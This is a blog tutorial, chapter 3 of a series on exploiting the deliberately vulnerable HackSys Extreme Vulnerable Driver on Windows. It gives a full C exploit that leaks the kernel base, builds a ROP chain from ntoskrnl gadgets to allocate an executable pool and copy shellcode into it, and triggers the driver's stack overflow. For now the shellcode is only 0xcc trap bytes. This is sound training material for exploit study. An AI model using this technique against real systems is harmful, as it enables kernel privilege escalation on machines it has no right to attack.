[Cracking Windows Kernel with HEVD] Chapter 3: Can we rop our way into triggering our shellcode?

Cracking HackSys Extreme Vulnerable Driver: Can we rop our way into triggering our shellcode?

When are we building the payload here?

Patience! Thus far we have seen the basics to correctly assemble a usable payload. Now that we have all the tools necessary, let’s finally create our payload. May the force be with us. If you missed the previous posts, make sure to check them out.

Our ROP chain should look something like this:

xor ecx, ecx; ret; -> zeroes out our RCX register, which is the first parameter of AllocatePoolWithTag()
pop rdx; ret ; -> pops 0x1000 (4096) to rdx register, which is the second parameter of AllocatePoolWithTag() and indicates the size of the pool
0x1000 -> value of rdx
AllocatePoolWithTag() -> calls the AllocatePoolWithTag function. The address of the allocated pool will then be in rax
mov rcx, rax; ret; -> copies the address to rcx, which will be first parameter of memcpy
pop rdx; ret -> gets the source address from stack. This will be our shellcode in userland that will escalate privileges.
<address of shellcode location in userland>
pop r8; ret; -> gets the size from stack.
<size of our shellcode to be copied>
memcpy() -> calls the memcpy function and copies our payload to an executable kernel space
jmp rcx; -> jumps to a register which stores the address of our shellcode in kernel land

That sounds pretty complicated and will probably not work like that. We will most likely have to make a few adaptations. However, the plan is simple: allocate a writable and executable location in kernel land, copy our payload to it and then jump there. We need to find gadgets to do what we want. And for that, we shall use ropper. This tool will assist us in our ROP journey by helping us to find the gadgets.

We may copy ntoskrnl.exe to a machine in which ropper is installed and then look for gadgets!

Let’s fire ropper up!

And now…

This is what we have got:

0x38cf53: xor ecx, ecx; mov rax, rcx; ret; -> Zeroes out rcx register. Also zeroes out rax, but that is ok. Couldn't find a gadget that just turned rcx into 0.
0x416748: pop rdx; ret; -> pops 0x1000 (4096), just like we planned
0x1000 -> value of rdx and size of the buffer
AllocatePoolWithTag(); -> function to allocate an executable pool
0xa155de: add rsp, 0x20; ret -> will be explained later
0x20a263: push rax; pop rbx; ret; -> Moving the address in rax to rbx for later use. 
0x5af724: push rax; pop r13; ret; -> Moving the addres in rax to r13
0x2c0da6: xchg r8, r13; ret;  -> Now exchanging values of r13 and r8
0x93ac7a: mov rcx, r8; mov rax, rcx; ret; -> Finally moving r8 to rcx, as we wished. A single gadget in our draft (mov rcx, rax; ret) was replaced by the last three gadgets. Gadgets are hard to find! We must improvise.
0x416748: pop rdx; ret; -> Popping the address of the shellcode to rdx
<ADDRESS OF SHELLCODE>
0x2017f1: pop r8; ret; -> Popping the size of the shellcode to r8
<SIZE OF SHELLCODE>
memcpy(); -> Address of memcpy function to copy our shellcode to the executable pool
0x408aa2: jmp rbx; -> Jumping to our shellcode. Remember we saved it for later use?

What a mess! This looks far from the payload we predicted. It’s messy and big. This happened because it is hard to find gadgets that fit exactly to our needs. We often have to compromise and accept some collateral damage.

There is one more catch. Check ExAllocatePoolWithTag’s prologue:

As we can see, it uses fast call procedure with shadow space, AKA home space. In this convention, the caller must reserve 32 bytes on stack for the callee. For ExAllocatePoolWithTag, only 24 bytes are needed. This means that after AllocatePoolWithTag we must make sure to add 0x18 to rsp. I found an add rsp, 0x20 that will do just fine. I place it after AllocatePoolWithTag.

Here is what we have so far:

#include <iostream>
#include <string>
#include <Windows.h>
#include <Psapi.h><F10>

#define DEVICE_NAME	"\\\\.\\HackSysExtremeVulnerableDriver"
#define IOCTL(Function) CTL_CODE(FILE_DEVICE_UNKNOWN, Function, METHOD_NEITHER, FILE_ANY_ACCESS)


//Gadgets
unsigned long long g_add_rsp_20h_ret = 0xa155de;

unsigned long long g_pop_rdi_pop_r14_pop_rbx_ret = 0x20a518;
unsigned long long g_xor_ecx_ecx_mov_rax_rcx_ret = 0x38cf53;
unsigned long long g_pop_rdx_ret = 0x416748;
unsigned long long g_push_rax_pop_rbx_ret = 0x20a263;
unsigned long long g_push_rax_pop_r13_ret = 0x5af724;
unsigned long long g_xchg_r8_r13_ret = 0x2c0da6;
unsigned long long g_mov_rcx_r8_mov_rax_rcx_ret = 0x93ac7a;
unsigned long long g_pop_r8_ret = 0x2017f1;
unsigned long long g_jmp_rbx = 0x408aa2;
unsigned long long kernel_ExAllocatePoolWithTag;
unsigned long long kernel_memcpy;

// This will store the pid for the process which privileges will be elevated
DWORD pid;


// Gets kernel base addr
unsigned long long get_kernel_base_addr() {
	LPVOID drivers[1024];
	DWORD cbNeeded;

	EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded);

	return (unsigned long long)drivers[0];
}

// Gets handle to driver
HANDLE get_handle() {
	HANDLE h = CreateFileA(DEVICE_NAME,
		FILE_READ_ACCESS | FILE_WRITE_ACCESS,
		FILE_SHARE_READ | FILE_SHARE_WRITE,
		NULL,
		OPEN_EXISTING,
		FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
		NULL);

	if (h == INVALID_HANDLE_VALUE) {
		printf("Failed to get handle =(\n");
		return NULL;
	}
	return h;
}

//Helper function to add gadget or address to payload and increment the offset automatically
void add_to_payload(char *in_buffer, SIZE_T *offset, unsigned long long *data, SIZE_T size)
{
	memcpy(in_buffer + *offset, data, size);
	printf("Wrote %lx to offset %u\n", *data, *offset);
	*offset += size;
}

//Looks up a kernel symbol
PVOID get_kernel_symbol_addr(const char *symbol) {
	PVOID kernelBaseAddr;
	HMODULE userKernelHandle;
	PCHAR functionAddress;
	unsigned long long offset;

	kernelBaseAddr = (PVOID)get_kernel_base_addr();  // Loaded kernel base address
	userKernelHandle = LoadLibraryA("C:\\Windows\\System32\\ntoskrnl.exe");  // Opens kernel binary as lib

	if (userKernelHandle == INVALID_HANDLE_VALUE) {
		return NULL;
	}

	functionAddress = (PCHAR)GetProcAddress(userKernelHandle, symbol);  // Locates the symbol address
	if (functionAddress == NULL) {
		return NULL;
	}

	offset = functionAddress - ((PCHAR)userKernelHandle);  // Subtracts the library base address in memory from the function addresses.
	return (PVOID)(((PCHAR)kernelBaseAddr) + offset);  // Adds the offset to the leaked kernel base address
}

// Auxiliary function to adjust the offsets for all the gadgets and used functions
void adjust_offsets()
{
	unsigned long long kernel_base_addr = get_kernel_base_addr();
	g_xor_ecx_ecx_mov_rax_rcx_ret += kernel_base_addr;
	g_pop_rdi_pop_r14_pop_rbx_ret += kernel_base_addr;
	g_add_rsp_20h_ret += kernel_base_addr;
	g_pop_rdx_ret += kernel_base_addr;
	g_push_rax_pop_rbx_ret += kernel_base_addr;
	g_push_rax_pop_r13_ret += kernel_base_addr;
	g_xchg_r8_r13_ret += kernel_base_addr;
	g_mov_rcx_r8_mov_rax_rcx_ret += kernel_base_addr;
	g_pop_r8_ret += kernel_base_addr;
	g_jmp_rbx += kernel_base_addr;
	
	kernel_ExAllocatePoolWithTag = (unsigned long long) get_kernel_symbol_addr("ExAllocatePoolWithTag");
	kernel_memcpy = (unsigned long long) get_kernel_symbol_addr("memcpy");
	printf("Primary token: %xu \n", (ULONGLONG)kernel_PsReferencePrimaryToken - kernel_base_addr);
	printf("PsReferencePrimaryToken base addr: %xu\n", (ULONGLONG) kernel_PsReferencePrimaryToken - (ULONGLONG) kernel_base_addr);
}

//Spawns a new cmd and returns the pid for the process
DWORD spawnCmd() {
	STARTUPINFO si;
	PROCESS_INFORMATION pi;
	char cmd[] = "C:\\Windows\\System32\\cmd.exe";

	ZeroMemory(&si, sizeof(si));
	si.cb = sizeof(si);
	ZeroMemory(&pi, sizeof(pi));

	// Start the child process. 
	if (!CreateProcess(NULL,	// No module name (use command line)
		cmd,					// Command line
		NULL,					// Process handle not inheritable
		NULL,					// Thread handle not inheritable
		FALSE,					// Set handle inheritance to FALSE
		CREATE_NEW_CONSOLE,     // No creation flags
		NULL,					// Use parent's environment block
		NULL,					// Use parent's starting directory 
		&si,					// Pointer to STARTUPINFO structure
		&pi)					// Pointer to PROCESS_INFORMATION structure
		)
	{
		printf("CreateProcess failed (%d).\n", GetLastError());
		return -1;
	}

	return pi.dwProcessId;
}


char *generate_shellcode() {
	//Generates and returns a shellcode to be executed after the ROP chain. This shellcode must do heavy lifting to elevate privileges.
	char *shellcode = (char*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 64);
	memset(shellcode, 0xcc, 64);
	return shellcode;
}

void do_buffer_overflow(HANDLE h)
{
	SIZE_T in_buffer_size = 2072 + 8 * 15 + 0x20; // 2072 is the offset; there are 15 8-byte long gadgets and an add rsp, 0x20.
	//Allocates memory for buffer
	PULONG in_buffer = (PULONG)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, in_buffer_size);
	//Fills with AAAAAAA...
	memset((char *)in_buffer, 'A', in_buffer_size);
	
	SIZE_T offset = 2072;

	//Spawns cmd and adjusts the pid
	pid = spawnCmd();
	//Adjust gadgets offsets
	adjust_offsets();
	//Our shellcode to escalate privileges. To be crafted!
	char *shellcode = generate_shellcode();

	//Arbitrary size of our shellcode
	unsigned long long size_of_copy = 0x100;

	

	add_to_payload((char*)in_buffer, &offset, &g_xor_ecx_ecx_mov_rax_rcx_ret, 8);
	add_to_payload((char*)in_buffer, &offset, &g_pop_rdx_ret, 8);
	add_to_payload((char*)in_buffer, &offset, &size_of_copy, 8);
	add_to_payload((char*)in_buffer, &offset, &kernel_ExAllocatePoolWithTag, 8);
	add_to_payload((char*)in_buffer, &offset, &g_add_rsp_20h_ret, 8);
	offset += 0x20;

	add_to_payload((char*)in_buffer, &offset, &g_push_rax_pop_rbx_ret, 8);
	add_to_payload((char*)in_buffer, &offset, &g_push_rax_pop_r13_ret, 8);
	add_to_payload((char*)in_buffer, &offset, &g_xchg_r8_r13_ret, 8);
	add_to_payload((char*)in_buffer, &offset, &g_mov_rcx_r8_mov_rax_rcx_ret, 8);
	add_to_payload((char*)in_buffer, &offset, &g_pop_rdx_ret, 8);
	add_to_payload((char*)in_buffer, &offset, (unsigned long long *)(&shellcode), 8);
	add_to_payload((char*)in_buffer, &offset, &g_pop_r8_ret, 8);
	add_to_payload((char*)in_buffer, &offset, &size_of_copy, 8);
	add_to_payload((char*)in_buffer, &offset, &kernel_memcpy, 8);
	add_to_payload((char*)in_buffer, &offset, &g_jmp_rbx, 8);
	

	system("pause");
	printf("Sending buffer.\n");
	//Sends buffer
	bool result = DeviceIoControl(h, STACK_OVERFLOW_IOCTL_NUMBER, in_buffer, (DWORD)in_buffer_size, NULL, 0, NULL, NULL);
	if (!result)
	{
		printf("IOCTL Failed: %X\n", GetLastError());
	}
	HeapFree(GetProcessHeap(), 0, (LPVOID)in_buffer);
}


int main(int argc, char **argv)
{
	do_buffer_overflow(get_handle());
	system("pause");
}

The exploit is getting big. Let me explain some of the functions I have created:

add_to_payload: you provide the buffer to which you wish to write, the current offset, the value you wish to copy and the size. It will copy the amount of bytes provided to the buffer at the offset provided and will increment the offset in N, where N is the size provided.

generate_shellcode: this function will allocate a buffer in userland, put the shellcode for EoP in it and return the address. Memcpy in our ROP chain will copy the shellcode from the address allocated in this function to a kernel RWX region. For now, it will just be filled with 0xcc instructions, triggering a trap upon execution.

spawnCmd: this spawns a new cmd and returns its pid. This will be the process which privileges we will elevate.

adjust_offsets: function to adjust all offsets with image base addr.

This exploit will trigger a stack based overflow that will execute our ROPChain in the stack. The ROPChain will allocate executable (and writable) space to allocate our shellcode and copy it to the allocated memory. Then, it will jump to this region of memory and execute our shellcode. The shellcode should contain instructions do elevate our cmd process’ privileges. Are you with me so far?

The exploit should trigger a trap on WinDBG. Let us try:

I DO NOT BELIEVE THIS WORKED! The debugger has caught our trap. Now “all” we have to do is craft a shellcode that will elevate privileges and return gracefully (or with as much grace as possible) to userland. But this will be a topic for the next post! See you then!